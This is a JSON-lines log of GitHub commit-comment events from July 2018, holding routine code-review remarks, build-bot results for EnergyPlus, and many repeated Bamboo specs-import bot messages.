{"id":"7967735280","type":"CommitCommentEvent","actor":{"login":"Hanumanjee"},"repo":{"name":"Hanumanjee/heymaa"},"payload":{"comment":{"id":29713758,"position":null,"line":null,"path":null,"commit_id":"bd509c46ff4d837e505473efc9b07bd3261b7cf7","created_at":"2018-07-15T18:15:37Z","updated_at":"2018-07-15T18:15:37Z","author_association":"OWNER","body":"test"}},"created_at":"2018-07-15T18:15:37Z"}
{"id":"7967735731","type":"CommitCommentEvent","actor":{"login":"TurboProgramming"},"repo":{"name":"flarum/core"},"payload":{"comment":{"id":29713759,"position":null,"line":null,"path":null,"commit_id":"fb9a89f67ffc3cc81ed765d459745ca8dc73c229","created_at":"2018-07-15T18:16:01Z","updated_at":"2018-07-15T18:16:01Z","author_association":"NONE","body":"@tobscure I applied this code using the inspector on my browser and got the result below:\r\n\r\n![screenshot_2018-07-15 appybuilder community 8](https://user-images.githubusercontent.com/17576065/42736768-24af6652-8874-11e8-8e59-917cf5d394b5.png)\r\n\r\nIs this what it supposed to look like? \r\n\r\n```\r\n.NotificationsDropdown-unread {\r\n position: absolute;\r\n  top: 2px;\r\n  left: 18px;\r\n  background: @header-control-color;\r\n  color: @header-bg;\r\n  font-size: 11px;\r\n  font-weight: bold;\r\n  padding: 2px 4px 3px;\r\n  line-height: 1em;\r\n  border-radius: 10px;\r\n  .box-shadow(0 0 0 1px @header-bg);\r\n  min-width: 16px;\r\n  height: 16px;\r\n  text-align: center\r\n}\r\n```"}},"created_at":"2018-07-15T18:16:01Z"}
{"id":"7967736684","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29713763,"position":null,"line":null,"path":null,"commit_id":"a8a6b30241eb3322ff14c56ac5a4320870ac4e6e","created_at":"2018-07-15T18:16:47Z","updated_at":"2018-07-15T18:16:47Z","author_association":"NONE","body":"<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-a8a6b30241eb3322ff14c56ac5a4320870ac4e6e-x86_64-Linux-Ubuntu-14.04-gcc-4.8.html'>Unhandled Failure</a>\n"}},"created_at":"2018-07-15T18:16:47Z"}
{"id":"7967738195","type":"CommitCommentEvent","actor":{"login":"yumizhu"},"repo":{"name":"megha4994/3250-Team-3-project"},"payload":{"comment":{"id":29713765,"position":null,"line":null,"path":null,"commit_id":"055ce35cc2740f652cd4688851110d9bf09c19f7","created_at":"2018-07-15T18:17:57Z","updated_at":"2018-07-15T18:17:57Z","author_association":"COLLABORATOR","body":"data cleaning (dealing with missing values and outliers) and exploratory data analysis (correlation analysis and anova analysis) "}},"created_at":"2018-07-15T18:17:57Z"}
{"id":"7967738870","type":"CommitCommentEvent","actor":{"login":"fabianfrz"},"repo":{"name":"opnsense/core"},"payload":{"comment":{"id":29713768,"position":null,"line":null,"path":null,"commit_id":"b36a3906e47f3e5d85bd8a1dd0057d7f3c774d8d","created_at":"2018-07-15T18:18:30Z","updated_at":"2018-07-15T18:18:30Z","author_association":"MEMBER","body":"poor idea - breaks the whole config: https://github.com/opnsense/core/blob/master/src/opnsense/service/templates/OPNsense/Proxy/squid.acl.conf#L39\r\n\r\nThe ACL will not be defined and you will access a non existing ACL."}},"created_at":"2018-07-15T18:18:30Z"}
{"id":"7967739569","type":"CommitCommentEvent","actor":{"login":"Sharlikran"},"repo":{"name":"wrye-bash/wrye-bash"},"payload":{"comment":{"id":29713770,"position":null,"line":null,"path":null,"commit_id":"9598a77032c6e56e35f3d70faab624c0bdf1b453","created_at":"2018-07-15T18:19:06Z","updated_at":"2018-07-15T18:19:06Z","author_association":"CONTRIBUTOR","body":"Thank for doing that. I tried getting getSlotsUsed() once and it didn't work. Using either the baseclass or derivedclass and then getSlotsUsed with the builtin help, have me some missing attribute error of some kind. I wouldn't remember the error.  \r\n\r\nI'll have to see if it's working like I thought it should the next time I try it."}},"created_at":"2018-07-15T18:19:06Z"}
{"id":"7967739909","type":"CommitCommentEvent","actor":{"login":"gokceneraslan"},"repo":{"name":"theislab/scanpy"},"payload":{"comment":{"id":29713771,"position":135,"line":126,"path":"scanpy/tools/rank_genes_groups.py","commit_id":"ad488601cd444bd5bb329a9ada16dcc0ac5ae232","created_at":"2018-07-15T18:19:22Z","updated_at":"2018-07-15T18:19:22Z","author_association":"CONTRIBUTOR","body":"No idea what `t-test_correction_factors` refers to, but maybe this should be `method ==`."}},"created_at":"2018-07-15T18:19:22Z"}
{"id":"7967742185","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29713777,"position":null,"line":null,"path":null,"commit_id":"46f14abc96336851feee32a7fc631c00ae8ef2ff","created_at":"2018-07-15T18:21:08Z","updated_at":"2018-07-15T18:21:08Z","author_association":"OWNER","body":"# Specs execution successful\n:scroll: [View logs](http://bamboo.comnull)\n### Plans updated\n\nBamboo specs have been successfully imported and the following plans have been updated.\n\nProject | Plan | Build\n---|---|---\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\n\n### Deployments updated\n\nBamboo specs have been successfully imported and the following deployment projects have been updated.\n\n|Deployment project |\n----|\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\n"}},"created_at":"2018-07-15T18:21:08Z"}
{"id":"7967742806","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29713778,"position":null,"line":null,"path":null,"commit_id":"a8a6b30241eb3322ff14c56ac5a4320870ac4e6e","created_at":"2018-07-15T18:21:38Z","updated_at":"2018-07-15T18:21:38Z","author_association":"NONE","body":"#6806-InconsistentConvectionCoeffs (RKStrand) - x86_64-Linux-Ubuntu-14.04-cppcheck-1.61: OK (0 of 0 tests passed, 0 test warnings)\n\n\n\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-a8a6b30241eb3322ff14c56ac5a4320870ac4e6e-x86_64-Linux-Ubuntu-14.04-cppcheck-1.61.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a>  \n"}},"created_at":"2018-07-15T18:21:38Z"}
{"id":"7967742865","type":"CommitCommentEvent","actor":{"login":"nrel-bot"},"repo":{"name":"drewyh/EnergyPlus"},"payload":{"comment":{"id":29713779,"position":null,"line":null,"path":null,"commit_id":"7128b1fcff620f11c2ba8476bd9d3311fa88d5e0","created_at":"2018-07-15T18:21:41Z","updated_at":"2018-07-15T18:21:41Z","author_association":"NONE","body":"use_eigen_HeatBalanceIntRadExchange (drewyh) - i386-Windows-7-VisualStudio-14: Tests Failed (2363 of 2924 tests passed, 62 test warnings)\n\nMessages:\n\n * 623 tests had: EIO diffs.\n * 502 tests had: ESO small diffs.\n * 557 tests had: Table big diffs.\n * 359 tests had: MTR small diffs.\n * 1 test had: BND diffs.\n * 85 tests had: ESO big diffs.\n * 102 tests had: AUD diffs.\n * 41 tests had: MTR big diffs.\n * 27 tests had: ERR diffs.\n * 23 tests had: ZSZ small diffs.\n * 2 tests had: MTD diffs.\n * 9 tests had: SSZ small diffs.\n * 3 tests had: Table small diffs.\n * 3 tests had: SSZ big diffs.\n * 1 test had: ZSZ big diffs.\n\nFailures:\n\n\nregression Test Summary\n * Passed: 62\n * Failed: 561\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-7128b1fcff620f11c2ba8476bd9d3311fa88d5e0-PR6737-i386-Windows-7-VisualStudio-14.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-7128b1fcff620f11c2ba8476bd9d3311fa88d5e0-PR6737-i386-Windows-7-VisualStudio-14.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-80.81%25-red.png)</a> \n"}},"created_at":"2018-07-15T18:21:41Z"}
{"id":"7967743396","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29713783,"position":null,"line":null,"path":null,"commit_id":"00b7483b5b50f7e4bb5018976b57fec6cbe53cd4","created_at":"2018-07-15T18:22:05Z","updated_at":"2018-07-15T18:22:05Z","author_association":"OWNER","body":"# Specs execution successful\n:scroll: [View logs](http://bamboo.comnull)\n### Plans updated\n\nBamboo specs have been successfully imported and the following plans have been updated.\n\nProject | Plan | Build\n---|---|---\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\n\n### Deployments updated\n\nBamboo specs have been successfully imported and the following deployment projects have been updated.\n\n|Deployment project |\n----|\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\n"}},"created_at":"2018-07-15T18:22:05Z"}
{"id":"7967743782","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29713787,"position":null,"line":null,"path":null,"commit_id":"584f36882d0c14bf45f90dd115ba0559428ab34e","created_at":"2018-07-15T18:22:22Z","updated_at":"2018-07-15T18:22:22Z","author_association":"OWNER","body":"# Specs execution successful\n:scroll: [View logs](http://bamboo.comnull)\n### Plans updated\n\nBamboo specs have been successfully imported and the following plans have been updated.\n\nProject | Plan | Build\n---|---|---\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\n\n### Deployments updated\n\nBamboo specs have been successfully imported and the following deployment projects have been updated.\n\n|Deployment project |\n----|\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\n"}},"created_at":"2018-07-15T18:22:22Z"}
{"id":"7967752725","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29713822,"position":null,"line":null,"path":null,"commit_id":"46f14abc96336851feee32a7fc631c00ae8ef2ff","created_at":"2018-07-15T18:29:15Z","updated_at":"2018-07-15T18:29:15Z","author_association":"OWNER","body":"# Specs execution successful\n:scroll: [View logs](http://bamboo.comnull)\n### Plans updated\n\nBamboo specs have been successfully imported and the following plans have been updated.\n\nProject | Plan | Build\n---|---|---\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\n\n### Deployments updated\n\nBamboo specs have been successfully imported and the following deployment projects have been updated.\n\n|Deployment project |\n----|\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\n"}},"created_at":"2018-07-15T18:29:15Z"}
{"id":"7967752778","type":"CommitCommentEvent","actor":{"login":"chikamichi"},"repo":{"name":"khammileon/s02e01-challenge1"},"payload":{"comment":{"id":29713823,"position":46,"line":46,"path":"js/app.js","commit_id":"f0c291528c060eee806b4f365bf06e1dee80605d","created_at":"2018-07-15T18:29:18Z","updated_at":"2018-07-15T18:29:18Z","author_association":"NONE","body":"Héhé bien tenté :) Si tu veux représenter, en JavaScript, l'idée de VRAI ou FAUX, le type booléen est tout indiqué, mais attention, on écrit bien `true` et `false`, pas `\"true\"` et `\"false\"` (qui sont des chaînes de caractères, qu'on considère comme étant toujours « vraies » => elles existent et représentent simplement les mots « true » et « false »)."}},"created_at":"2018-07-15T18:29:18Z"}
{"id":"7967752908","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29713824,"position":null,"line":null,"path":null,"commit_id":"effbf0cb0bd289925da79124c5b8e778a92736bc","created_at":"2018-07-15T18:29:25Z","updated_at":"2018-07-15T18:29:25Z","author_association":"OWNER","body":"# Specs execution successful\n:scroll: [View logs](http://bamboo.comnull)\n### Plans updated\n\nBamboo specs have been successfully imported and the following plans have been updated.\n\nProject | Plan | Build\n---|---|---\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\n\n### Deployments updated\n\nBamboo specs have been successfully imported and the following deployment projects have been updated.\n\n|Deployment project |\n----|\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\n"}},"created_at":"2018-07-15T18:29:25Z"}
{"id":"7967753394","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29713825,"position":null,"line":null,"path":null,"commit_id":"8a6a92031d3bf7bc8d71b0fb7dbca764abc49fdb","created_at":"2018-07-15T18:29:48Z","updated_at":"2018-07-15T18:29:48Z","author_association":"OWNER","body":"# Specs execution successful\n:scroll: [View logs](http://bamboo.comnull)\n### Plans updated\n\nBamboo specs have been successfully imported and the following plans have been updated.\n\nProject | Plan | Build\n---|---|---\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\n\n### Deployments updated\n\nBamboo specs have been successfully imported and the following deployment projects have been updated.\n\n|Deployment project |\n----|\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\n"}},"created_at":"2018-07-15T18:29:48Z"}
{"id":"7967753564","type":"CommitCommentEvent","actor":{"login":"chikamichi"},"repo":{"name":"khammileon/s02e01-challenge1"},"payload":{"comment":{"id":29713826,"position":46,"line":46,"path":"js/app.js","commit_id":"f0c291528c060eee806b4f365bf06e1dee80605d","created_at":"2018-07-15T18:29:58Z","updated_at":"2018-07-15T18:29:58Z","author_association":"NONE","body":"C'est important, car si ensuite tu veux appliquer de la logique booléenne, avec des if/else par exemple, c'est plus simple d'avoir des valeurs booléennes que des chaînes de caractères."}},"created_at":"2018-07-15T18:29:58Z"}
{"id":"7967753742","type":"CommitCommentEvent","actor":{"login":"chukwudy"},"repo":{"name":"chukwudy/hello_world"},"payload":{"comment":{"id":29713829,"position":null,"line":null,"path":null,"commit_id":"a85f789044223b8ebb3de3bfcf4c1c8d368ce6d8","created_at":"2018-07-15T18:30:07Z","updated_at":"2018-07-15T18:30:07Z","author_association":"OWNER","body":"more i want be expect on web and mobile apps as well , machine learning "}},"created_at":"2018-07-15T18:30:07Z"}
{"id":"7967754252","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29713832,"position":null,"line":null,"path":null,"commit_id":"c6d06d8d0f59b201a6f7c792af17763a724a9816","created_at":"2018-07-15T18:30:26Z","updated_at":"2018-07-15T18:30:26Z","author_association":"OWNER","body":"# Specs execution successful\n:scroll: [View logs](http://bamboo.comnull)\n### Plans updated\n\nBamboo specs have been successfully imported and the following plans have been updated.\n\nProject | Plan | Build\n---|---|---\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\n\n### Deployments updated\n\nBamboo specs have been successfully imported and the following deployment projects have been updated.\n\n|Deployment project |\n----|\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\n"}},"created_at":"2018-07-15T18:30:26Z"}
{"id":"7967754421","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29713834,"position":null,"line":null,"path":null,"commit_id":"e14f66d8e23120c4afd27ff771368548859a514a","created_at":"2018-07-15T18:30:33Z","updated_at":"2018-07-15T18:30:33Z","author_association":"OWNER","body":"# Specs execution successful\n:scroll: [View logs](http://bamboo.comnull)\n### Plans updated\n\nBamboo specs have been successfully imported and the following plans have been updated.\n\nProject | Plan | Build\n---|---|---\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\n\n### Deployments updated\n\nBamboo specs have been successfully imported and the following deployment projects have been updated.\n\n|Deployment project |\n----|\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\n"}},"created_at":"2018-07-15T18:30:33Z"}
{"id":"7967754800","type":"CommitCommentEvent","actor":{"login":"tomtor"},"repo":{"name":"official-stockfish/Stockfish"},"payload":{"comment":{"id":29713835,"position":null,"line":null,"path":null,"commit_id":"4925a9910a5e54167952a07830519e835d58c187","created_at":"2018-07-15T18:30:51Z","updated_at":"2018-07-15T18:30:51Z","author_association":"NONE","body":"I get\r\n\r\n───────────────────────────────────────────────────────\r\nBase-4925a99 doesn't have option mPassedFile[1]\r\nNew-4925a99 doesn't have option PassedDanger[2]\r\nNew-4925a99 doesn't have option mPassedFile[1]\r\n...\r\n"}},"created_at":"2018-07-15T18:30:51Z"}
{"id":"7967755052","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29713837,"position":null,"line":null,"path":null,"commit_id":"732090f331e4882a5ab94802e599362f94afd450","created_at":"2018-07-15T18:31:04Z","updated_at":"2018-07-15T18:31:04Z","author_association":"OWNER","body":"# Specs execution successful\n:scroll: [View logs](http://bamboo.comnull)\n### Plans updated\n\nBamboo specs have been successfully imported and the following plans have been updated.\n\nProject | Plan | Build\n---|---|---\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\n\n### Deployments updated\n\nBamboo specs have been successfully imported and the following deployment projects have been updated.\n\n|Deployment project |\n----|\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\n"}},"created_at":"2018-07-15T18:31:04Z"}
{"id":"7967755763","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29713838,"position":null,"line":null,"path":null,"commit_id":"effbf0cb0bd289925da79124c5b8e778a92736bc","created_at":"2018-07-15T18:31:37Z","updated_at":"2018-07-15T18:31:37Z","author_association":"OWNER","body":"# Specs execution successful\n:scroll: [View logs](http://bamboo.comnull)\n### Plans updated\n\nBamboo specs have been successfully imported and the following plans have been updated.\n\nProject | Plan | Build\n---|---|---\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\n\n### Deployments updated\n\nBamboo specs have been successfully imported and the following deployment projects have been updated.\n\n|Deployment project |\n----|\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\n"}},"created_at":"2018-07-15T18:31:37Z"}
{"id":"7967755827","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29713839,"position":null,"line":null,"path":null,"commit_id":"d846bee7b995a60038d1ab284be4b15525c7a5fa","created_at":"2018-07-15T18:31:40Z","updated_at":"2018-07-15T18:31:40Z","author_association":"OWNER","body":"# Specs execution successful\n:scroll: [View logs](http://bamboo.comnull)\n### Plans updated\n\nBamboo specs have been successfully imported and the following plans have been updated.\n\nProject | Plan | Build\n---|---|---\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\n\n### Deployments updated\n\nBamboo specs have been successfully imported and the following deployment projects have been updated.\n\n|Deployment project |\n----|\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\n"}},"created_at":"2018-07-15T18:31:40Z"}
{"id":"7967756651","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29713841,"position":null,"line":null,"path":null,"commit_id":"b743c93a2505b2b6701159344167851ea1b8b857","created_at":"2018-07-15T18:32:18Z","updated_at":"2018-07-15T18:32:18Z","author_association":"OWNER","body":"# Specs execution successful\n:scroll: [View logs](http://bamboo.comnull)\n### Plans updated\n\nBamboo specs have been successfully imported and the following plans have been updated.\n\nProject | Plan | Build\n---|---|---\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\n\n### Deployments updated\n\nBamboo specs have been successfully imported and the following deployment projects have been updated.\n\n|Deployment project |\n----|\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\n"}},"created_at":"2018-07-15T18:32:18Z"}
{"id":"7967756737","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29713842,"position":null,"line":null,"path":null,"commit_id":"46f14abc96336851feee32a7fc631c00ae8ef2ff","created_at":"2018-07-15T18:32:22Z","updated_at":"2018-07-15T18:32:22Z","author_association":"OWNER","body":"# Specs execution successful\r\n:scroll: [View logs](http://bamboo.comnull)\r\n### Plans updated\r\n\r\nBamboo specs have been successfully imported and the following plans have been updated.\r\n\r\nProject | Plan | Build\r\n---|---|---\r\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\r\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\r\n\r\n### Deployments updated\r\n\r\nBamboo specs have been successfully imported and the following deployment projects have been updated.\r\n\r\n|Deployment project |\r\n----|\r\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\r\n"}},"created_at":"2018-07-15T18:32:22Z"}
{"id":"7967756928","type":"CommitCommentEvent","actor":{"login":"rkhemka"},"repo":{"name":"rkhemka/CS-3220-Introduction-to-Web-Development-"},"payload":{"comment":{"id":29713843,"position":null,"line":null,"path":null,"commit_id":"b59aee20dedf3970758111b8356a487f54d5c1ff","created_at":"2018-07-15T18:32:32Z","updated_at":"2018-07-15T18:32:32Z","author_association":"OWNER","body":"This Web Development course is highly recommended if you are beginner for web technology. which consist of 24 programming lab assigments while some additional practice assigments which I had implement with a view to understand web development The course contains codes written in HTML, CSS, Servlet, JSP, EL, JSTL, SQL, JDBC, Java Script, Jquery and AJAX. I learned about MVC model and its role in detail in these course"}},"created_at":"2018-07-15T18:32:32Z"}
{"id":"7967757247","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29713844,"position":null,"line":null,"path":null,"commit_id":"b743c93a2505b2b6701159344167851ea1b8b857","created_at":"2018-07-15T18:32:48Z","updated_at":"2018-07-15T18:32:48Z","author_association":"OWNER","body":"# Specs execution successful\n:scroll: [View logs](http://bamboo.comnull)\n### Plans updated\n\nBamboo specs have been successfully imported and the following plans have been updated.\n\nProject | Plan | Build\n---|---|---\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\n\n### Deployments updated\n\nBamboo specs have been successfully imported and the following deployment projects have been updated.\n\n|Deployment project |\n----|\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\n"}},"created_at":"2018-07-15T18:32:48Z"}
{"id":"7967757274","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29713845,"position":null,"line":null,"path":null,"commit_id":"a28f341c2ef3441af8a6b63e4e08fdb4890fc544","created_at":"2018-07-15T18:32:49Z","updated_at":"2018-07-15T18:32:49Z","author_association":"OWNER","body":"# Specs execution successful\n:scroll: [View logs](http://bamboo.comnull)\n### Plans updated\n\nBamboo specs have been successfully imported and the following plans have been updated.\n\nProject | Plan | Build\n---|---|---\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\n\n### Deployments updated\n\nBamboo specs have been successfully imported and the following deployment projects have been updated.\n\n|Deployment project |\n----|\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\n"}},"created_at":"2018-07-15T18:32:49Z"}
{"id":"7967757656","type":"CommitCommentEvent","actor":{"login":"chikamichi"},"repo":{"name":"khammileon/s02e01-challenge1"},"payload":{"comment":{"id":29713846,"position":83,"line":83,"path":"js/app.js","commit_id":"f0c291528c060eee806b4f365bf06e1dee80605d","created_at":"2018-07-15T18:33:07Z","updated_at":"2018-07-15T18:33:07Z","author_association":"NONE","body":"Très bien ce code :+1: if/else :heavy_check_mark: indentation :heavy_check_mark: concaténation :heavy_check_mark:  "}},"created_at":"2018-07-15T18:33:07Z"}
{"id":"7967758164","type":"CommitCommentEvent","actor":{"login":"fichtner"},"repo":{"name":"opnsense/core"},"payload":{"comment":{"id":29713848,"position":null,"line":null,"path":null,"commit_id":"ea10cdb8156fa6deed1991a7b68d82ad0255e1e7","created_at":"2018-07-15T18:33:31Z","updated_at":"2018-07-15T18:33:31Z","author_association":"MEMBER","body":"@fabianfrz better ?"}},"created_at":"2018-07-15T18:33:31Z"}
{"id":"7967758195","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29713849,"position":null,"line":null,"path":null,"commit_id":"93a0183c3b07e184676c2c1539fba6a83e9271d5","created_at":"2018-07-15T18:33:32Z","updated_at":"2018-07-15T18:33:32Z","author_association":"OWNER","body":"# Specs execution successful\n:scroll: [View logs](http://bamboo.comnull)\n### Plans updated\n\nBamboo specs have been successfully imported and the following plans have been updated.\n\nProject | Plan | Build\n---|---|---\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\n\n### Deployments updated\n\nBamboo specs have been successfully imported and the following deployment projects have been updated.\n\n|Deployment project |\n----|\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\n"}},"created_at":"2018-07-15T18:33:32Z"}
